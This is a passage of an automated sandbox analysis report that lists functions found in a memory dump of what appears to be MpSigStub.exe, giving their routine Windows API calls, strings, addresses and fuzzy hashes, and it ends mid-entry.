Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$MessageOpenTrace
String ID:
API String ID: 2474424771-0
Opcode ID: 19dd5049f072f672215af5adeec2a9248c8ceffef428bb451ab7929f5e1c01e7
Instruction ID: de6f65daa32fb7ae4a74bd8ea0995decaed42a8e2428d4f121dc468ef0cc54ad
Opcode Fuzzy Hash: 19dd5049f072f672215af5adeec2a9248c8ceffef428bb451ab7929f5e1c01e7
Instruction Fuzzy Hash: 3131B221A0974282EB00AB4DE440379A7A0EF66F44FA48136CB5D4776ECF3EE952C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5851958, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7B584B4C5), ref: 00007FF7B58519A8

Part of subcall function 00007FF7B58400C4: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,000000BC870F023C,00007FF7B5843FA6,?,?,?,00007FF7B5843FE3,?,?,00000000,00007FF7B5842A5C,?,?,00007FF7B5847B8A,00007FF7B584298F), ref: 00007FF7B58400DA
Part of subcall function 00007FF7B58400C4: GetLastError.KERNEL32(?,?,000000BC870F023C,00007FF7B5843FA6,?,?,?,00007FF7B5843FE3,?,?,00000000,00007FF7B5842A5C,?,?,00007FF7B5847B8A,00007FF7B584298F), ref: 00007FF7B58400E4

Strings

C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe, xrefs: 00007FF7B5851996

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread
String ID: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe
API String ID: 3765080282-1414369675
Opcode ID: 6c5ab2fdce98a09a61de29b8a424d6377490e36591d253269e28088e8ecf4d98
Instruction ID: 880f5bf87c7c54e7c87eee31aff378447ce8d7ddc5270d28412b28d8ece16736
Opcode Fuzzy Hash: 6c5ab2fdce98a09a61de29b8a424d6377490e36591d253269e28088e8ecf4d98
Instruction Fuzzy Hash: 70416F35A0874286EB16EF29A4500B9A795FB56F94B844035EF4E47B9EEF3CD4A18320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582CB8C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32 ref: 00007FF7B582CBDD

Strings

InstallLocation, xrefs: 00007FF7B582CB9B

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue
String ID: InstallLocation
API String ID: 3660427363-779285727
Opcode ID: b19c8d8a7259a1f39adb752e0ed158d48c3df1c3d6968d2ac82567ce1c50f78c
Instruction ID: af9ea89469c6ecf5a9adf4adaa9c96c274687f217fd6f9f227dd74114184989c
Opcode Fuzzy Hash: b19c8d8a7259a1f39adb752e0ed158d48c3df1c3d6968d2ac82567ce1c50f78c
Instruction Fuzzy Hash: 2B31C332A0874292EB10AB09A440179FB90FB66F84F944532DF5D0776EDF3EE4618B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582AAA8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 00007FF7B582AB02

Part of subcall function 00007FF7B57C7204: TraceMessage.ADVAPI32 ref: 00007FF7B57C7281

Strings

feclient.dll, xrefs: 00007FF7B582AAB7

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoadMessageTrace
String ID: feclient.dll
API String ID: 1270396623-3074931424
Opcode ID: 1a07806c53cd8353d6fbde91afbd0e851ee9053b54e79030d98d782d9392604a
Instruction ID: 4bd3c58427a7e7cc1cba07675448350337d2e0314bcb3cbe578064231aded524
Opcode Fuzzy Hash: 1a07806c53cd8353d6fbde91afbd0e851ee9053b54e79030d98d782d9392604a
Instruction Fuzzy Hash: 33117221A0864185FB44AB1DD4501B9EB90EF96F84F944031DB1D8376ECF7ED952C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DCA44, Relevance: 3.2, APIs: 2, Instructions: 241COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4 ref: 00007FF7B57DCC51
UuidCreate.RPCRT4 ref: 00007FF7B57DCCCD

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateUuid
String ID:
API String ID: 1827684710-0
Opcode ID: a1b969cc7c0b87b9f5763a7bf5e6c0aa3bd7e57e18d7b33a0d598b8876e8481e
Instruction ID: 14db941e37e05ccefc944aac03c8ecde8383a27c00dd6495e1dca9c654967926
Opcode Fuzzy Hash: a1b969cc7c0b87b9f5763a7bf5e6c0aa3bd7e57e18d7b33a0d598b8876e8481e
Instruction Fuzzy Hash: 1EA1D462B0868149FB10EB7995043F9A7A8BB6AB48F884135DF4D477CFDE7CA495C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582C598, Relevance: 3.1, APIs: 2, Instructions: 90COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?,?,?,00000000), ref: 00007FF7B582C5C7
GetFileVersionInfoExW.KERNELBASE ref: 00007FF7B582C655

Part of subcall function 00007FF7B582DF80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B582830E), ref: 00007FF7B582DF84

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoVersion$ErrorLastSize
String ID:
API String ID: 1421007290-0
Opcode ID: bbcbc38b55186265d408d08c23c5ef7f9b98be36d2156d41e941d1418617c3f6
Instruction ID: 69546b4aad48c68d942a1dfc4ec5512c2ffa24cba5d80367a264f12dd079fb0e
Opcode Fuzzy Hash: bbcbc38b55186265d408d08c23c5ef7f9b98be36d2156d41e941d1418617c3f6
Instruction Fuzzy Hash: E431D821B0864241FA10BB1DD40027AEB91AFA6F80F948035DB0D877AFDE7EE451C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582DDD0, Relevance: 3.1, APIs: 2, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c79956dd75ae0214e253a27286039852eaa92edd1974fc319200e0effc72f7dd
Instruction ID: 6eedacc8898044ac0d28fdedf34f57ebd69de6f9513edfa35a9be4ee7195cc79
Opcode Fuzzy Hash: c79956dd75ae0214e253a27286039852eaa92edd1974fc319200e0effc72f7dd
Instruction Fuzzy Hash: EA219525A0D682C5F7107B29E540178AB92AB76F80FC80031DB9E4776ECF3DE8A58360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5852AB8, Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7B5851AFA), ref: 00007FF7B5852ACC
FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7B5851AFA), ref: 00007FF7B5852B36

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: d4842fb92cdab706e2edf110e62892c90b1fa8c60e19597b99e0deb25caa5f62
Instruction ID: 7460e1d72c975b0659d52707b526aadc3f594ac0983b3a6962b6c228f57c090b
Opcode Fuzzy Hash: d4842fb92cdab706e2edf110e62892c90b1fa8c60e19597b99e0deb25caa5f62
Instruction Fuzzy Hash: F301A111F1976585EA25BB29740102AA360AB65FE0BC84630EF5E177DFDE3CE8628320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582D9E8, Relevance: 3.0, APIs: 2, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF7B57CEFBA), ref: 00007FF7B582D9F0
HeapSetInformation.KERNEL32(?,?,?,00007FF7B57CEFBA), ref: 00007FF7B582DA26

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleHeapInformationModule
String ID:
API String ID: 2151972328-0
Opcode ID: 02bca03daff13d1e643a0057d6adb5d4a2b8b3dbc90f065f7c12764746914740
Instruction ID: 4b894221c4daa5a914aa901166b47e3e23e7961b699ac27a7f205b9eaf0bc680
Opcode Fuzzy Hash: 02bca03daff13d1e643a0057d6adb5d4a2b8b3dbc90f065f7c12764746914740
Instruction Fuzzy Hash: A2F04F20B1D14382F75537BCA466A79A9925F76B01F840034E71F8519FEE7EA4794220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B58400C4, Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMON

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,000000BC870F023C,00007FF7B5843FA6,?,?,?,00007FF7B5843FE3,?,?,00000000,00007FF7B5842A5C,?,?,00007FF7B5847B8A,00007FF7B584298F), ref: 00007FF7B58400DA
GetLastError.KERNEL32(?,?,000000BC870F023C,00007FF7B5843FA6,?,?,?,00007FF7B5843FE3,?,?,00000000,00007FF7B5842A5C,?,?,00007FF7B5847B8A,00007FF7B584298F), ref: 00007FF7B58400E4

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 36ba5e0b5d9424e5667cca5269fb9646897875572a99b9aa869437477647ab71
Instruction ID: 24173ab250cc155af515e48e39bec2f6cf57ab7362a7b175822ecd0ccb50978e
Opcode Fuzzy Hash: 36ba5e0b5d9424e5667cca5269fb9646897875572a99b9aa869437477647ab71
Instruction Fuzzy Hash: 02E04F50E0824286FA157BFA9845075A2915F76F41F844030DB0E4726FEE7C64A15270

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DC82C, Relevance: 2.6, APIs: 2, Instructions: 72COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7B57DC898

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

CloseHandle.KERNEL32 ref: 00007FF7B57DC920

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$MessageTrace
String ID:
API String ID: 2615336596-0
Opcode ID: b80738b8837d4d3999dcc084f94c3c15f10b8522951a72e521508fd650a286bf
Instruction ID: 503583cc3f07a440e8dd8381f228bb8d967fd239bcbbdf46414b2cd963670fcd
Opcode Fuzzy Hash: b80738b8837d4d3999dcc084f94c3c15f10b8522951a72e521508fd650a286bf
Instruction Fuzzy Hash: 10319572B0864286EB14DF19E444269B7A4FBAAF84F944030DB5C43BAECF3DD451CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582A728, Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 00007FF7B582A784

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: bc40a48d0f2fb3931cdcc05ad58aa5e2a889f5ab936ba0b668e859d19ba972bb
Instruction ID: b52ea21b4e03924016cc63af7778c84b9b417be9d9f1a40433ee9b2a98523aa4
Opcode Fuzzy Hash: bc40a48d0f2fb3931cdcc05ad58aa5e2a889f5ab936ba0b668e859d19ba972bb
Instruction Fuzzy Hash: 9C11C321B0C64385F710A61DA480379DBA29F66F84FA44034DF8C87AAEDFBED4658754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582A660, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF7B582A6A1

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a2411111439330e7509505d45d007a362253c75b71c4c61ffbf4b1037deb4749
Instruction ID: 9395c27b42863556ce2d95ca7c6c9220d3c8beb8899d276855e06db043ee7e6d
Opcode Fuzzy Hash: a2411111439330e7509505d45d007a362253c75b71c4c61ffbf4b1037deb4749
Instruction Fuzzy Hash: C8219D31A0864286EB10AB1DE440775A7A1FBA5BA8F904331DB7E43BEEDF7DD4518B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582A8B4, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE ref: 00007FF7B582A8EF

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c6591be22f2a5db6a5921d4bf4eb6cf47d8a9094384f9724d56b3c82e81b8a5b
Instruction ID: 1a6845a37b4590eed1aeb36fa7f5f3bdedf6c8b6ee41a8479317faf8cfb351cd
Opcode Fuzzy Hash: c6591be22f2a5db6a5921d4bf4eb6cf47d8a9094384f9724d56b3c82e81b8a5b
Instruction Fuzzy Hash: 5A11B122A0860782E710AB1EE04037DA7A0AF66F84FA18031D76C476AEDF7FD4A19750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582D018, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.ADVAPI32 ref: 00007FF7B582D02C

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: 4711942dc77be6d09a93e8d005228ae92a8609d7de0eb3a80eca9bd594b1d323
Instruction ID: b6bb5b77a7ecc2df2a0dc68784f8bd020182e451c75a1f43249b327684e1b2b2
Opcode Fuzzy Hash: 4711942dc77be6d09a93e8d005228ae92a8609d7de0eb3a80eca9bd594b1d323
Instruction Fuzzy Hash: 02114F60A0964381FB10B71D94402B5AB92EB72F44FD04531CB2D4A2BEDF7FE5AB8761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B584004C, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7B583FA1A,?,?,?,00007FF7B583F369,?,?,?,?,00007FF7B584ADEA,?,?,00000000), ref: 00007FF7B58400A1

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1180cbc3d579a63662ac545250496273dab7af880ad086554cfc23806d4ba688
Instruction ID: 459b09685a374fd7c627854607466dff6e4be67a0d2b9552be330e8b14d40b43
Opcode Fuzzy Hash: 1180cbc3d579a63662ac545250496273dab7af880ad086554cfc23806d4ba688
Instruction Fuzzy Hash: DFF06254B0934789FE6676A994112BAD2955FB6F40FC84431CF0E8A6EFEE7CE4A04630

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582AC1C, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7B57C5FF0), ref: 00007FF7B582AC2F

Part of subcall function 00007FF7B582DF80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B582830E), ref: 00007FF7B582DF84

Part of subcall function 00007FF7B57C7204: TraceMessage.ADVAPI32 ref: 00007FF7B57C7281

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesErrorFileLastMessageTrace
String ID:
API String ID: 2626060577-0
Opcode ID: f32518cc31583ababe69e5cd0f7cd8474d37278e505b3f881247fd9a59fb4272
Instruction ID: c0a8da80df1e7cddbf708e185bf80bd38587058792ca3f87a7fbd03ef3bf7b00
Opcode Fuzzy Hash: f32518cc31583ababe69e5cd0f7cd8474d37278e505b3f881247fd9a59fb4272
Instruction Fuzzy Hash: 2801F231A0814286EB01BB1DE0401B8A791FF66F88FA84231DB2D833AECF7ED4558760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DB158, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,00000000), ref: 00007FF7B57DB1A5

Part of subcall function 00007FF7B57DB114: GetProcessTimes.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7B57DB18C,?,?,00000000), ref: 00007FF7B57DB141

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotificationProcessTimes
String ID:
API String ID: 1141055841-0
Opcode ID: 4988112bcea89dc8d30fff9948504aec4dfcff620247804f0e4ac8caf638f377
Instruction ID: e7a783cc6efe4f1245ecc648cd86195d0cd27068176ce45f80cbd3768d0cc8e2
Opcode Fuzzy Hash: 4988112bcea89dc8d30fff9948504aec4dfcff620247804f0e4ac8caf638f377
Instruction Fuzzy Hash: FAF08662B2868181FB54AB1AE44072AB660EFD5FC0F848131EB4D03B9ECF3DE441CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DDF34, Relevance: 1.5, APIs: 1, Instructions: 30timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNELBASE ref: 00007FF7B57DDF99

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageTimerTraceWaitable
String ID:
API String ID: 3274569144-0
Opcode ID: 33ed32903125dd49394f8a12c9ddc444a7944345a8020514bfbfc00d1750315d
Instruction ID: ba5ef98d9239e9dc2c998d3422dbe6325056644a34a50d93d5db300f2a3ba0de
Opcode Fuzzy Hash: 33ed32903125dd49394f8a12c9ddc444a7944345a8020514bfbfc00d1750315d
Instruction Fuzzy Hash: 3701F7B1B0824381F7207718A4047B9E790EB76B58FE04231D66C465EEDF7DD04AC720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B58418F0, Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF7B584ADD1,?,?,00000000,00007FF7B584A223,?,?,?,00007FF7B58478B3,?,?,?,00007FF7B58477A9), ref: 00007FF7B584192E

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 169e88246d9e6ca3b6947b6e2b1089d8f00c263aaaf9b1cbd9c0c5264d5a3429
Instruction ID: 8ae81158223e66d4c58571da012ee10d16fd9d486b50bdb8958c0934efdedd1e
Opcode Fuzzy Hash: 169e88246d9e6ca3b6947b6e2b1089d8f00c263aaaf9b1cbd9c0c5264d5a3429
Instruction Fuzzy Hash: FDF05440A0C24749FA55367A545227DD5905F66F60FC84634DF2F462DFDE3CA4614134

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582A7E8, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000000,00007FF7B57DA28B), ref: 00007FF7B582A7F6

Part of subcall function 00007FF7B582DF80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B582830E), ref: 00007FF7B582DF84

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastMessagePointerTrace
String ID:
API String ID: 2921293514-0
Opcode ID: b131ec56189737f344aeff52e625201d02346aaf8ca5bd15b2f30667da2dcacf
Instruction ID: 8cdaac2e4d82f9023c90066f18470e813e7e6ff7e3e08559e42f9b6805d581dc
Opcode Fuzzy Hash: b131ec56189737f344aeff52e625201d02346aaf8ca5bd15b2f30667da2dcacf
Instruction Fuzzy Hash: 82F09A24B1810381FB10B72E98416B5A6809F7AF08FD00030CB1D86AAFDE7ED4A7C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DB114, Relevance: 1.5, APIs: 1, Instructions: 18timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7B57DB18C,?,?,00000000), ref: 00007FF7B57DB141

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
